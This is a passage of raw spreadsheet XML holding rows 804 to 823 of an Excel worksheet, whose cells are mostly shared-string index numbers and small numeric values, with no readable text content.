      <c r="D804" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F804" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G804" s="12" t="s">
        <v>6072</v>
      </c>
      <c r="H804" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I804" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J804" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K804" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L804" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M804" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N804" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O804" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P804" s="12" t="s">
        <v>6073</v>
      </c>
      <c r="Q804" s="12">
        <v>2.6</v>
      </c>
      <c r="R804" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S804" s="12" t="s">
        <v>6074</v>
      </c>
      <c r="T804" s="12" t="s">
        <v>6075</v>
      </c>
      <c r="U804" s="12" t="s">
        <v>6076</v>
      </c>
      <c r="V804" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W804" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X804" s="12">
        <v>2</v>
      </c>
      <c r="Y804" s="12" t="s">
        <v>6077</v>
      </c>
    </row>
    <row r="805" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A805" s="12">
        <v>4061</v>
      </c>
      <c r="B805" s="12" t="s">
        <v>29033</v>
      </c>
      <c r="D805" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F805" s="12" t="s">
        <v>28986</v>
      </c>
      <c r="G805" s="12" t="s">
        <v>6083</v>
      </c>
      <c r="H805" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I805" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J805" s="12" t="s">
        <v>2643</v>
      </c>
      <c r="K805" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L805" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M805" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N805" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O805" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P805" s="12" t="s">
        <v>6084</v>
      </c>
      <c r="Q805" s="12">
        <v>2.6</v>
      </c>
      <c r="R805" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S805" s="12" t="s">
        <v>6085</v>
      </c>
      <c r="T805" s="12" t="s">
        <v>6086</v>
      </c>
      <c r="U805" s="12" t="s">
        <v>5007</v>
      </c>
      <c r="V805" s="12" t="s">
        <v>5008</v>
      </c>
      <c r="W805" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X805" s="12">
        <v>4</v>
      </c>
      <c r="Y805" s="12" t="s">
        <v>6087</v>
      </c>
    </row>
    <row r="806" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A806" s="12">
        <v>4065</v>
      </c>
      <c r="B806" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D806" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F806" s="12" t="s">
        <v>29758</v>
      </c>
      <c r="G806" s="12" t="s">
        <v>6088</v>
      </c>
      <c r="H806" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I806" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J806" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K806" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L806" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M806" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N806" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O806" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P806" s="12" t="s">
        <v>6089</v>
      </c>
      <c r="Q806" s="12">
        <v>2.6</v>
      </c>
      <c r="R806" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S806" s="12" t="s">
        <v>6090</v>
      </c>
      <c r="T806" s="12" t="s">
        <v>6091</v>
      </c>
      <c r="U806" s="12" t="s">
        <v>6092</v>
      </c>
      <c r="V806" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W806" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X806" s="12">
        <v>6</v>
      </c>
      <c r="Y806" s="12" t="s">
        <v>6093</v>
      </c>
    </row>
    <row r="807" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A807" s="12">
        <v>4067</v>
      </c>
      <c r="B807" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D807" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F807" s="12" t="s">
        <v>29005</v>
      </c>
      <c r="G807" s="12" t="s">
        <v>6094</v>
      </c>
      <c r="H807" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I807" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J807" s="12" t="s">
        <v>1314</v>
      </c>
      <c r="K807" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L807" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M807" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N807" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O807" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P807" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q807" s="12">
        <v>2.6</v>
      </c>
      <c r="R807" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S807" s="12" t="s">
        <v>6095</v>
      </c>
      <c r="T807" s="12" t="s">
        <v>6096</v>
      </c>
      <c r="U807" s="12" t="s">
        <v>6097</v>
      </c>
      <c r="V807" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W807" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X807" s="12">
        <v>2</v>
      </c>
      <c r="Y807" s="12" t="s">
        <v>6098</v>
      </c>
    </row>
    <row r="808" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A808" s="12">
        <v>4097</v>
      </c>
      <c r="B808" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C808" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D808" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F808" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G808" s="12" t="s">
        <v>6110</v>
      </c>
      <c r="H808" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I808" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J808" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K808" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L808" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M808" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N808" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O808" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P808" s="12" t="s">
        <v>6111</v>
      </c>
      <c r="Q808" s="12" t="s">
        <v>28288</v>
      </c>
      <c r="R808" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S808" s="12" t="s">
        <v>6112</v>
      </c>
      <c r="T808" s="12" t="s">
        <v>6113</v>
      </c>
      <c r="U808" s="12" t="s">
        <v>6114</v>
      </c>
      <c r="V808" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W808" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X808" s="12">
        <v>5</v>
      </c>
      <c r="Y808" s="12" t="s">
        <v>6115</v>
      </c>
    </row>
    <row r="809" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A809" s="12">
        <v>4098</v>
      </c>
      <c r="B809" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C809" s="12" t="s">
        <v>29048</v>
      </c>
      <c r="D809" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E809" s="18" t="s">
        <v>31602</v>
      </c>
      <c r="F809" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G809" s="12" t="s">
        <v>6116</v>
      </c>
      <c r="H809" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I809" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J809" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K809" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L809" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M809" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N809" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O809" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P809" s="12" t="s">
        <v>6117</v>
      </c>
      <c r="Q809" s="12" t="s">
        <v>28288</v>
      </c>
      <c r="R809" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S809" s="12" t="s">
        <v>6118</v>
      </c>
      <c r="T809" s="12" t="s">
        <v>2089</v>
      </c>
      <c r="U809" s="12" t="s">
        <v>6119</v>
      </c>
      <c r="V809" s="12" t="s">
        <v>6120</v>
      </c>
      <c r="W809" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X809" s="12">
        <v>9</v>
      </c>
      <c r="Y809" s="12" t="s">
        <v>6121</v>
      </c>
    </row>
    <row r="810" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A810" s="12">
        <v>4099</v>
      </c>
      <c r="B810" s="12" t="s">
        <v>29025</v>
      </c>
      <c r="D810" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F810" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G810" s="12" t="s">
        <v>6122</v>
      </c>
      <c r="H810" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I810" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J810" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K810" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L810" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M810" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N810" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O810" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P810" s="12" t="s">
        <v>5210</v>
      </c>
      <c r="Q810" s="12">
        <v>2.6</v>
      </c>
      <c r="R810" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S810" s="12" t="s">
        <v>6123</v>
      </c>
      <c r="T810" s="12" t="s">
        <v>6124</v>
      </c>
      <c r="U810" s="12" t="s">
        <v>6125</v>
      </c>
      <c r="V810" s="12" t="s">
        <v>197</v>
      </c>
      <c r="W810" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X810" s="12">
        <v>3</v>
      </c>
      <c r="Y810" s="12" t="s">
        <v>6126</v>
      </c>
    </row>
    <row r="811" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A811" s="12">
        <v>4105</v>
      </c>
      <c r="B811" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D811" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E811" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F811" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G811" s="12" t="s">
        <v>6127</v>
      </c>
      <c r="H811" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I811" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J811" s="12" t="s">
        <v>1299</v>
      </c>
      <c r="K811" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L811" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M811" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N811" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O811" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P811" s="12" t="s">
        <v>6128</v>
      </c>
      <c r="Q811" s="12" t="s">
        <v>28289</v>
      </c>
      <c r="R811" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S811" s="12" t="s">
        <v>6129</v>
      </c>
      <c r="T811" s="12" t="s">
        <v>5951</v>
      </c>
      <c r="U811" s="12" t="s">
        <v>6130</v>
      </c>
      <c r="V811" s="12" t="s">
        <v>1302</v>
      </c>
      <c r="W811" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X811" s="12">
        <v>6</v>
      </c>
      <c r="Y811" s="12" t="s">
        <v>6131</v>
      </c>
    </row>
    <row r="812" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A812" s="12">
        <v>4115</v>
      </c>
      <c r="B812" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C812" s="12" t="s">
        <v>28492</v>
      </c>
      <c r="D812" s="12" t="s">
        <v>28986</v>
      </c>
      <c r="F812" s="12" t="s">
        <v>29049</v>
      </c>
      <c r="G812" s="12" t="s">
        <v>6132</v>
      </c>
      <c r="H812" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I812" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J812" s="12" t="s">
        <v>363</v>
      </c>
      <c r="K812" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L812" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M812" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N812" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O812" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P812" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q812" s="12">
        <v>2.6</v>
      </c>
      <c r="R812" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S812" s="12" t="s">
        <v>6133</v>
      </c>
      <c r="T812" s="12" t="s">
        <v>5896</v>
      </c>
      <c r="U812" s="12" t="s">
        <v>6134</v>
      </c>
      <c r="V812" s="12" t="s">
        <v>1367</v>
      </c>
      <c r="W812" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X812" s="12">
        <v>1</v>
      </c>
      <c r="Y812" s="12" t="s">
        <v>6135</v>
      </c>
    </row>
    <row r="813" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A813" s="12">
        <v>4137</v>
      </c>
      <c r="B813" s="12" t="s">
        <v>29050</v>
      </c>
      <c r="D813" s="12" t="s">
        <v>28986</v>
      </c>
      <c r="F813" s="12" t="s">
        <v>28997</v>
      </c>
      <c r="G813" s="12" t="s">
        <v>6143</v>
      </c>
      <c r="H813" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I813" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J813" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K813" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L813" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M813" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N813" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O813" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P813" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q813" s="12">
        <v>2.6</v>
      </c>
      <c r="R813" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S813" s="12" t="s">
        <v>6144</v>
      </c>
      <c r="T813" s="12" t="s">
        <v>6145</v>
      </c>
      <c r="U813" s="12" t="s">
        <v>6146</v>
      </c>
      <c r="V813" s="12" t="s">
        <v>5738</v>
      </c>
      <c r="W813" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X813" s="12">
        <v>1</v>
      </c>
      <c r="Y813" s="12" t="s">
        <v>6147</v>
      </c>
    </row>
    <row r="814" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A814" s="12">
        <v>4145</v>
      </c>
      <c r="B814" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D814" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E814" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F814" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G814" s="12" t="s">
        <v>6148</v>
      </c>
      <c r="H814" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I814" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J814" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K814" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L814" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M814" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N814" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O814" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P814" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q814" s="12">
        <v>2.6</v>
      </c>
      <c r="R814" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S814" s="12" t="s">
        <v>6149</v>
      </c>
      <c r="T814" s="12" t="s">
        <v>3468</v>
      </c>
      <c r="U814" s="12" t="s">
        <v>6150</v>
      </c>
      <c r="V814" s="12" t="s">
        <v>4769</v>
      </c>
      <c r="W814" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X814" s="12">
        <v>2</v>
      </c>
      <c r="Y814" s="12" t="s">
        <v>6151</v>
      </c>
    </row>
    <row r="815" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A815" s="12">
        <v>4155</v>
      </c>
      <c r="B815" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D815" s="12" t="s">
        <v>29034</v>
      </c>
      <c r="F815" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G815" s="12" t="s">
        <v>6157</v>
      </c>
      <c r="H815" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I815" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J815" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K815" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L815" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M815" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N815" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O815" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P815" s="12" t="s">
        <v>6158</v>
      </c>
      <c r="Q815" s="12">
        <v>2.6</v>
      </c>
      <c r="R815" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S815" s="12" t="s">
        <v>6159</v>
      </c>
      <c r="T815" s="12" t="s">
        <v>6160</v>
      </c>
      <c r="U815" s="12" t="s">
        <v>6161</v>
      </c>
      <c r="V815" s="12" t="s">
        <v>1923</v>
      </c>
      <c r="W815" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X815" s="12">
        <v>13</v>
      </c>
      <c r="Y815" s="12" t="s">
        <v>6162</v>
      </c>
    </row>
    <row r="816" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A816" s="12">
        <v>4157</v>
      </c>
      <c r="B816" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D816" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F816" s="12" t="s">
        <v>29051</v>
      </c>
      <c r="G816" s="12" t="s">
        <v>6163</v>
      </c>
      <c r="H816" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I816" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J816" s="12" t="s">
        <v>319</v>
      </c>
      <c r="K816" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L816" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M816" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N816" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O816" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P816" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q816" s="12">
        <v>2.6</v>
      </c>
      <c r="R816" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S816" s="12" t="s">
        <v>6164</v>
      </c>
      <c r="T816" s="12" t="s">
        <v>6165</v>
      </c>
      <c r="U816" s="12" t="s">
        <v>6166</v>
      </c>
      <c r="V816" s="12" t="s">
        <v>3816</v>
      </c>
      <c r="W816" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X816" s="12">
        <v>1</v>
      </c>
      <c r="Y816" s="12" t="s">
        <v>6167</v>
      </c>
    </row>
    <row r="817" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A817" s="12">
        <v>4188</v>
      </c>
      <c r="B817" s="12" t="s">
        <v>29050</v>
      </c>
      <c r="D817" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F817" s="12" t="s">
        <v>28986</v>
      </c>
      <c r="G817" s="12" t="s">
        <v>6184</v>
      </c>
      <c r="H817" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I817" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J817" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K817" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L817" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M817" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N817" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O817" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P817" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q817" s="12">
        <v>2.6</v>
      </c>
      <c r="R817" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S817" s="12" t="s">
        <v>6185</v>
      </c>
      <c r="T817" s="12" t="s">
        <v>6186</v>
      </c>
      <c r="U817" s="12" t="s">
        <v>6187</v>
      </c>
      <c r="V817" s="12" t="s">
        <v>299</v>
      </c>
      <c r="W817" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X817" s="12">
        <v>3</v>
      </c>
      <c r="Y817" s="12" t="s">
        <v>6188</v>
      </c>
    </row>
    <row r="818" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A818" s="12">
        <v>4196</v>
      </c>
      <c r="B818" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D818" s="12" t="s">
        <v>29005</v>
      </c>
      <c r="F818" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G818" s="12" t="s">
        <v>6200</v>
      </c>
      <c r="H818" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I818" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J818" s="12" t="s">
        <v>378</v>
      </c>
      <c r="K818" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L818" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M818" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N818" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O818" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P818" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q818" s="12">
        <v>2.6</v>
      </c>
      <c r="R818" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S818" s="12" t="s">
        <v>6201</v>
      </c>
      <c r="T818" s="12" t="s">
        <v>6202</v>
      </c>
      <c r="U818" s="12" t="s">
        <v>6203</v>
      </c>
      <c r="V818" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W818" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X818" s="12">
        <v>0</v>
      </c>
      <c r="Y818" s="12" t="s">
        <v>6204</v>
      </c>
    </row>
    <row r="819" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A819" s="12">
        <v>4219</v>
      </c>
      <c r="B819" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D819" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E819" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F819" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G819" s="12" t="s">
        <v>6222</v>
      </c>
      <c r="H819" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I819" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J819" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K819" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L819" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M819" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N819" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O819" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P819" s="12" t="s">
        <v>6172</v>
      </c>
      <c r="Q819" s="12" t="s">
        <v>28290</v>
      </c>
      <c r="R819" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S819" s="12" t="s">
        <v>6223</v>
      </c>
      <c r="T819" s="12" t="s">
        <v>6224</v>
      </c>
      <c r="U819" s="12" t="s">
        <v>6225</v>
      </c>
      <c r="V819" s="12" t="s">
        <v>4651</v>
      </c>
      <c r="W819" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X819" s="12">
        <v>10</v>
      </c>
      <c r="Y819" s="12" t="s">
        <v>6226</v>
      </c>
    </row>
    <row r="820" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A820" s="12">
        <v>4221</v>
      </c>
      <c r="B820" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D820" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F820" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G820" s="12" t="s">
        <v>6227</v>
      </c>
      <c r="H820" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I820" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J820" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K820" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L820" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M820" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N820" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O820" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P820" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q820" s="12">
        <v>2.6</v>
      </c>
      <c r="R820" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S820" s="12" t="s">
        <v>6228</v>
      </c>
      <c r="T820" s="12" t="s">
        <v>6229</v>
      </c>
      <c r="U820" s="12" t="s">
        <v>6230</v>
      </c>
      <c r="V820" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W820" s="12">
        <v>4243</v>
      </c>
      <c r="X820" s="12">
        <v>22</v>
      </c>
      <c r="Y820" s="12" t="s">
        <v>6231</v>
      </c>
    </row>
    <row r="821" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A821" s="12">
        <v>4228</v>
      </c>
      <c r="B821" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D821" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F821" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G821" s="12" t="s">
        <v>6238</v>
      </c>
      <c r="H821" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I821" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J821" s="12" t="s">
        <v>4121</v>
      </c>
      <c r="K821" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L821" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M821" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N821" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O821" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P821" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q821" s="12">
        <v>2.6</v>
      </c>
      <c r="R821" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S821" s="12" t="s">
        <v>6239</v>
      </c>
      <c r="T821" s="12" t="s">
        <v>39</v>
      </c>
      <c r="U821" s="12" t="s">
        <v>6240</v>
      </c>
      <c r="V821" s="12" t="s">
        <v>39</v>
      </c>
      <c r="W821" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X821" s="12">
        <v>2</v>
      </c>
      <c r="Y821" s="12" t="s">
        <v>6241</v>
      </c>
    </row>
    <row r="822" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A822" s="12">
        <v>4248</v>
      </c>
      <c r="B822" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D822" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F822" s="12" t="s">
        <v>28997</v>
      </c>
      <c r="G822" s="12" t="s">
        <v>6247</v>
      </c>
      <c r="H822" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I822" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J822" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K822" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L822" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M822" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N822" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O822" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P822" s="12" t="s">
        <v>6248</v>
      </c>
      <c r="Q822" s="12">
        <v>2.6</v>
      </c>
      <c r="R822" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S822" s="12" t="s">
        <v>6249</v>
      </c>
      <c r="T822" s="12" t="s">
        <v>6250</v>
      </c>
      <c r="U822" s="12" t="s">
        <v>6251</v>
      </c>
      <c r="V822" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W822" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X822" s="12">
        <v>2</v>
      </c>
      <c r="Y822" s="12" t="s">
        <v>6252</v>
      </c>
    </row>
    <row r="823" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A823" s="12">
        <v>4249</v>
      </c>
      <c r="B823" s="12" t="s">
        <v>29052</v>
      </c>
      <c r="C823" s="12" t="s">
        <v>29023</v>
      </c>
      <c r="D823" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E823" s="12" t="s">
        <v>31430</v>
      </c>
      <c r="F823" s="12" t="s">
        <v>28997</v>
      </c>
      <c r="G823" s="12" t="s">
        <v>6253</v>
      </c>
      <c r="H823" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I823" s="12" t="s">
        <v>111</v>
